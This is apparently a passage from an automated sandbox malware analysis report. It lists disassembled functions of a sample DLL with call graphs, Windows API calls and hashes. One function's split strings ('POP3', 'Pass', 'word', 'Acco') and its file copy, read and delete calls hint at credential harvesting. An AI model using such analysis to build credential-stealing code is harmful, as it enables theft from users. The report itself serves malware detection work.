                                                                                                                                                • _strlen.LIBCMT ref: 1000188B
                                                                                                                                                • _strlen.LIBCMT ref: 100018AE
                                                                                                                                                • _strlen.LIBCMT ref: 100018C8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                • API String ID: 3296212668-3023110444
                                                                                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen
                                                                                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                • API String ID: 4218353326-230879103
                                                                                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 276 10007cc2-10007cd6 277 10007d44-10007d4c 276->277 278 10007cd8-10007cdd 276->278 280 10007d93-10007dab call 10007e35 277->280 281 10007d4e-10007d51 277->281 278->277 279 10007cdf-10007ce4 278->279 279->277 282 10007ce6-10007ce9 279->282 290 10007dae-10007db5 280->290 281->280 284 10007d53-10007d90 call 1000571e * 4 281->284 282->277 285 10007ceb-10007cf3 282->285 284->280 288 10007cf5-10007cf8 285->288 289 10007d0d-10007d15 285->289 288->289 292 10007cfa-10007d0c call 1000571e call 100090ba 288->292 295 10007d17-10007d1a 289->295 296 10007d2f-10007d43 call 1000571e * 2 289->296 293 10007dd4-10007dd8 290->293 294 10007db7-10007dbb 290->294 292->289 304 10007df0-10007dfc 293->304 305 10007dda-10007ddf 293->305 300 10007dd1 294->300 301 10007dbd-10007dc0 294->301 295->296 302 10007d1c-10007d2e call 1000571e call 100091b8 295->302 296->277 300->293 301->300 311 10007dc2-10007dd0 call 1000571e * 2 301->311 302->296 304->290 309 10007dfe-10007e0b call 1000571e 304->309 306 10007de1-10007de4 305->306 307 10007ded 305->307 306->307 314 10007de6-10007dec call 1000571e 306->314 307->304 311->300 314->307
                                                                                                                                                APIs
                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                • _free.LIBCMT ref: 10007CFB
                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                • _free.LIBCMT ref: 10007D1D
                                                                                                                                                • _free.LIBCMT ref: 10007D32
                                                                                                                                                • _free.LIBCMT ref: 10007D3D
                                                                                                                                                • _free.LIBCMT ref: 10007D5F
                                                                                                                                                • _free.LIBCMT ref: 10007D72
                                                                                                                                                • _free.LIBCMT ref: 10007D80
                                                                                                                                                • _free.LIBCMT ref: 10007D8B
                                                                                                                                                • _free.LIBCMT ref: 10007DC3
                                                                                                                                                • _free.LIBCMT ref: 10007DCA
                                                                                                                                                • _free.LIBCMT ref: 10007DE7
                                                                                                                                                • _free.LIBCMT ref: 10007DFF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 100059EA
                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                • _free.LIBCMT ref: 100059F6
                                                                                                                                                • _free.LIBCMT ref: 10005A01
                                                                                                                                                • _free.LIBCMT ref: 10005A0C
                                                                                                                                                • _free.LIBCMT ref: 10005A17
                                                                                                                                                • _free.LIBCMT ref: 10005A22
                                                                                                                                                • _free.LIBCMT ref: 10005A2D
                                                                                                                                                • _free.LIBCMT ref: 10005A38
                                                                                                                                                • _free.LIBCMT ref: 10005A43
                                                                                                                                                • _free.LIBCMT ref: 10005A51
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1454806937-0
                                                                                                                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 377 10009492-100094ef GetConsoleCP 378 10009632-10009644 call 10002ada 377->378 379 100094f5-10009511 377->379 380 10009513-1000952a 379->380 381 1000952c-1000953d call 10007c19 379->381 384 10009566-10009575 call 100079e6 380->384 389 10009563-10009565 381->389 390 1000953f-10009542 381->390 384->378 391 1000957b-1000959b WideCharToMultiByte 384->391 389->384 392 10009548-1000955a call 100079e6 390->392 393 10009609-10009628 390->393 391->378 394 100095a1-100095b7 WriteFile 391->394 392->378 400 10009560-10009561 392->400 393->378 396 100095b9-100095ca 394->396 397 1000962a-10009630 GetLastError 394->397 396->378 399 100095cc-100095d0 396->399 397->378 401 100095d2-100095f0 WriteFile 399->401 402 100095fe-10009601 399->402 400->391 401->397 403 100095f2-100095f6 401->403 402->379 404 10009607 402->404 403->378 405 100095f8-100095fb 403->405 404->378 405->402
                                                                                                                                                APIs
                                                                                                                                                • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 406 10003370-100033b5 call 10003330 call 100037a7 411 10003416-10003419 406->411 412 100033b7-100033c9 406->412 413 10003439-10003442 411->413 414 1000341b-10003428 call 10003790 411->414 412->413 415 100033cb 412->415 418 1000342d-10003436 call 10003330 414->418 417 100033d0-100033e7 415->417 419 100033e9-100033f7 call 10003740 417->419 420 100033fd 417->420 418->413 428 100033f9 419->428 429 1000340d-10003414 419->429 421 10003400-10003405 420->421 421->417 424 10003407-10003409 421->424 424->413 427 1000340b 424->427 427->418 430 10003443-1000344c 428->430 431 100033fb 428->431 429->418 432 10003486-10003496 call 10003774 430->432 433 1000344e-10003455 430->433 431->421 439 10003498-100034a7 call 10003790 432->439 440 100034aa-100034c6 call 10003330 call 10003758 432->440 433->432 435 10003457-10003466 call 1000bbe0 433->435 441 10003483 435->441 442 10003468-10003480 435->442 439->440 441->432 442->441
                                                                                                                                                APIs
                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                • String ID: csm
                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                • _free.LIBCMT ref: 100092AB
                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                • _free.LIBCMT ref: 100092B6
                                                                                                                                                • _free.LIBCMT ref: 100092C1
                                                                                                                                                • _free.LIBCMT ref: 10009315
                                                                                                                                                • _free.LIBCMT ref: 10009320
                                                                                                                                                • _free.LIBCMT ref: 1000932B
                                                                                                                                                • _free.LIBCMT ref: 10009336
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 488 10008821-1000883a 489 10008850-10008855 488->489 490 1000883c-1000884c call 10009341 488->490 492 10008862-10008886 MultiByteToWideChar 489->492 493 10008857-1000885f 489->493 490->489 497 1000884e 490->497 495 10008a19-10008a2c call 10002ada 492->495 496 1000888c-10008898 492->496 493->492 498 1000889a-100088ab 496->498 499 100088ec 496->499 497->489 502 100088ca-100088db call 100056d0 498->502 503 100088ad-100088bc call 1000bf20 498->503 501 100088ee-100088f0 499->501 505 100088f6-10008909 MultiByteToWideChar 501->505 506 10008a0e 501->506 502->506 516 100088e1 502->516 503->506 515 100088c2-100088c8 503->515 505->506 509 1000890f-1000892a call 10005f19 505->509 510 10008a10-10008a17 call 10008801 506->510 509->506 520 10008930-10008937 509->520 510->495 517 100088e7-100088ea 515->517 516->517 517->501 521 10008971-1000897d 520->521 522 10008939-1000893e 520->522 524 100089c9 521->524 525 1000897f-10008990 521->525 522->510 523 10008944-10008946 522->523 523->506 528 1000894c-10008966 call 10005f19 523->528 529 100089cb-100089cd 524->529 526 10008992-100089a1 call 1000bf20 525->526 527 100089ab-100089bc call 100056d0 525->527 533 10008a07-10008a0d call 10008801 526->533 540 100089a3-100089a9 526->540 527->533 542 100089be 527->542 528->510 543 1000896c 528->543 529->533 534 100089cf-100089e8 call 10005f19 529->534 533->506 534->533 546 100089ea-100089f1 534->546 545 100089c4-100089c7 540->545 542->545 543->506 545->529 547 100089f3-100089f4 546->547 548 10008a2d-10008a33 546->548 549 100089f5-10008a05 WideCharToMultiByte 547->549 548->549 549->533 550 10008a35-10008a3c call 10008801 549->550 550->510
                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                • __freea.LIBCMT ref: 10008A08
                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                • __freea.LIBCMT ref: 10008A11
                                                                                                                                                • __freea.LIBCMT ref: 10008A36
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _strlen.LIBCMT ref: 10001607
                                                                                                                                                • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1922816806-0
                                                                                                                                                • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3594823470-0
                                                                                                                                                • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
